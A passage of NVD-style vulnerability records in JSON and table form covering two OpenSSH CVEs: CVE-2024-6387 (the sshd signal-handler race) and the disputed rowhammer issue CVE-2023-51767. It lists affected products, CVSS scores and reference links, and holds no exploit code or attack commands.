"matchCriteriaId": "79D770C6-7A57-4A49-8164-C55391F62301",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:freebsd:freebsd:14.1:p1:*:*:*:*:*:*",
"matchCriteriaId": "AA813990-8C8F-4EE8-9F2B-9F73C510A7B2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netbsd:netbsd:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A6A2EBE8-012E-470E-9E56-56ACBE345F78",
"versionEndIncluding": "10.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A security regression (CVE-2006-5051) was discovered in OpenSSH\u0027s server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period."
},
{
"lang": "es",
"value": "Se encontr\u00f3 una condici\u00f3n de ejecuci\u00f3n del controlador de se\u00f1ales en el servidor de OpenSSH (sshd), donde un cliente no se autentica dentro de los segundos de LoginGraceTime (120 de forma predeterminada, 600 en versiones anteriores de OpenSSH), luego se llama al controlador SIGALRM de sshd de forma asincr\u00f3nica. Sin embargo, este controlador de se\u00f1ales llama a varias funciones que no son seguras para se\u00f1ales as\u00edncronas, por ejemplo, syslog()."
}
],
"id": "CVE-2024-6387",
"lastModified": "2025-09-30T13:52:23.540",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "secalert@redhat.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-07-01T13:15:06.467",
"references": [
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4312"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4340"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4389"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4469"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4474"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4479"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4484"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-6387"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294604"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://santandersecurityresearch.github.io/blog/sshing_the_masses.html"
},
{
"source": "secalert@redhat.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://www.openssh.com/txt/release-9.8"
},
{
"source": "secalert@redhat.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://seclists.org/fulldisclosure/2024/Jul/18"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://seclists.org/fulldisclosure/2024/Jul/19"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://seclists.org/fulldisclosure/2024/Jul/20"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/01/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/01/13"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/02/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Patch"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/03/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/04/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/04/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/08/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/08/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/09/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/09/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/10/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/11/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/11/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/23/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/23/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/28/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/28/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4312"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4340"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4389"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4469"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4474"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4479"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/errata/RHSA-2024:4484"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-6387"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://archlinux.org/news/the-sshd-service-needs-to-be-restarted-after-upgrading-to-openssh-98p1/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage",
"Third Party Advisory"
],
"url": "https://arstechnica.com/security/2024/07/regresshion-vulnerability-in-openssh-gives-attackers-root-on-linux/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage",
"Third Party Advisory"
],
"url": "https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294604"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://explore.alas.aws.amazon.com/CVE-2024-6387.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://forum.vmssoftware.com/viewtopic.php?f=8\u0026t=9132"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2024-002.txt.asc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/AlmaLinux/updates/issues/629"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/Azure/AKS/issues/4379"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/PowerShell/Win32-OpenSSH/discussions/2248"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/PowerShell/Win32-OpenSSH/issues/2249"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/microsoft/azurelinux/issues/9555"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/openela-main/openssh/commit/e1f438970e5a337a17070a637c1b9e19697cad09"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/oracle/oracle-linux/issues/149"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/rapier1/hpn-ssh/issues/87"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/zgzhang/cve-2024-6387-poc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://lists.almalinux.org/archives/list/announce@lists.almalinux.org/thread/23BF5BMGFVEVUI2WNVAGMLKT557EU7VY/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Release Notes"
],
"url": "https://lists.mindrot.org/pipermail/openssh-unix-announce/2024-July/000158.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Patch"
],
"url": "https://lists.mindrot.org/pipermail/openssh-unix-dev/2024-July/041431.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://news.ycombinator.com/item?id=40843778"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://packetstorm.news/files/id/190587/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0010"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://santandersecurityresearch.github.io/blog/sshing_the_masses.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security-tracker.debian.org/tracker/CVE-2024-6387"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20240701-0001/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://sig-security.rocky.page/issues/CVE-2024-6387/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage",
"Third Party Advisory"
],
"url": "https://stackdiary.com/openssh-race-condition-in-sshd-allows-remote-code-execution/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://support.apple.com/kb/HT214118"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://support.apple.com/kb/HT214119"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://support.apple.com/kb/HT214120"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://ubuntu.com/security/CVE-2024-6387"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://ubuntu.com/security/notices/USN-6859-1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.akamai.com/blog/security-research/2024-openssh-vulnerability-regression-what-to-know-and-do"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.arista.com/en/support/advisories-notices/security-advisory/19904-security-advisory-0100"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://www.exploit-db.com/exploits/52269"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.freebsd.org/security/advisories/FreeBSD-SA-24:04.openssh.asc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://www.openssh.com/txt/release-9.8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.splunk.com/en_us/blog/security/cve-2024-6387-regresshion-vulnerability.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.suse.com/security/cve/CVE-2024-6387.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage",
"Third Party Advisory"
],
"url": "https://www.theregister.com/2024/07/01/regresshion_openssh/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.vicarius.io/vsociety/posts/regresshion-an-openssh-regression-error-cve-2024-6387"
}
],
"sourceIdentifier": "secalert@redhat.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-364"
}
],
"source": "secalert@redhat.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-362"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2023-51767
Vulnerability from fkie_nvd - Published: 2023-12-24 07:15 - Updated: 2025-11-18 22:15| URL | Tags | ||
|---|---|---|---|
| cve@mitre.org | https://access.redhat.com/security/cve/CVE-2023-51767 | Third Party Advisory | |
| cve@mitre.org | https://arxiv.org/abs/2309.02545 | Technical Description | |
| cve@mitre.org | https://bugzilla.redhat.com/show_bug.cgi?id=2255850 | Issue Tracking, Third Party Advisory | |
| cve@mitre.org | https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/auth-passwd.c#L77 | Product | |
| cve@mitre.org | https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/monitor.c#L878 | Product | |
| cve@mitre.org | https://security.netapp.com/advisory/ntap-20240125-0006/ | Third Party Advisory | |
| cve@mitre.org | https://ubuntu.com/security/CVE-2023-51767 | Third Party Advisory | |
| cve@mitre.org | https://www.openwall.com/lists/oss-security/2025/09/22/1 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/22/1 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/22/2 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/23/1 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/23/3 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/23/4 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/23/5 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/24/4 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/24/7 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/25/2 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/25/6 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/26/2 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/26/4 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/27/1 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/27/2 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/27/3 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/27/4 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/27/5 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/27/6 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/27/7 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/28/7 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/29/1 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/29/4 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/29/5 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/09/29/6 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/10/01/1 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/10/01/2 | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://access.redhat.com/security/cve/CVE-2023-51767 | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://arxiv.org/abs/2309.02545 | Technical Description | |
| af854a3a-2127-422b-91ae-364da2661108 | https://bugzilla.redhat.com/show_bug.cgi?id=2255850 | Issue Tracking, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/auth-passwd.c#L77 | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/monitor.c#L878 | Product | |
| af854a3a-2127-422b-91ae-364da2661108 | https://security.netapp.com/advisory/ntap-20240125-0006/ | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://ubuntu.com/security/CVE-2023-51767 | Third Party Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| openbsd | openssh | * | |
| fedoraproject | fedora | 39 | |
| redhat | enterprise_linux | 8.0 | |
| redhat | enterprise_linux | 9.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:openbsd:openssh:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C6D7D468-C829-4A4E-8865-E62D8EC5E274",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*",
"matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [
{
"sourceIdentifier": "cve@mitre.org",
"tags": [
"disputed"
]
}
],
"descriptions": [
{
"lang": "en",
"value": "OpenSSH through 10.0, when common types of DRAM are used, might allow row hammer attacks (for authentication bypass) because the integer value of authenticated in mm_answer_authpassword does not resist flips of a single bit. NOTE: this is applicable to a certain threat model of attacker-victim co-location in which the attacker has user privileges. NOTE: this is disputed by the Supplier, who states \"we do not consider it to be the application\u0027s responsibility to defend against platform architectural weaknesses.\""
},
{
"lang": "es",
"value": "OpenSSH hasta 9.6, cuando se utilizan tipos comunes de DRAM, podr\u00eda permitir row hammer attacks (para omitir la autenticaci\u00f3n) porque el valor entero de autenticado en mm_answer_authpassword no resiste cambios de un solo bit. NOTA: esto es aplicable a un determinado modelo de amenaza de ubicaci\u00f3n conjunta entre atacante y v\u00edctima en el que el atacante tiene privilegios de usuario."
}
],
"id": "CVE-2023-51767",
"lastModified": "2025-11-18T22:15:43.950",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-12-24T07:15:07.410",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-51767"
},
{
"source": "cve@mitre.org",
"tags": [
"Technical Description"
],
"url": "https://arxiv.org/abs/2309.02545"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255850"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/auth-passwd.c#L77"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/openssh/openssh-portable/blob/8241b9c0529228b4b86d88b1a6076fb9f97e4a99/monitor.c#L878"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20240125-0006/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://ubuntu.com/security/CVE-2023-51767"
},
{
"source": "cve@mitre.org",
"url": "https://www.openwall.com/lists/oss-security/2025/09/22/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/22/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/22/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/23/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/24/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/24/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/25/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/25/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/26/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/26/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/27/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/28/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/29/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
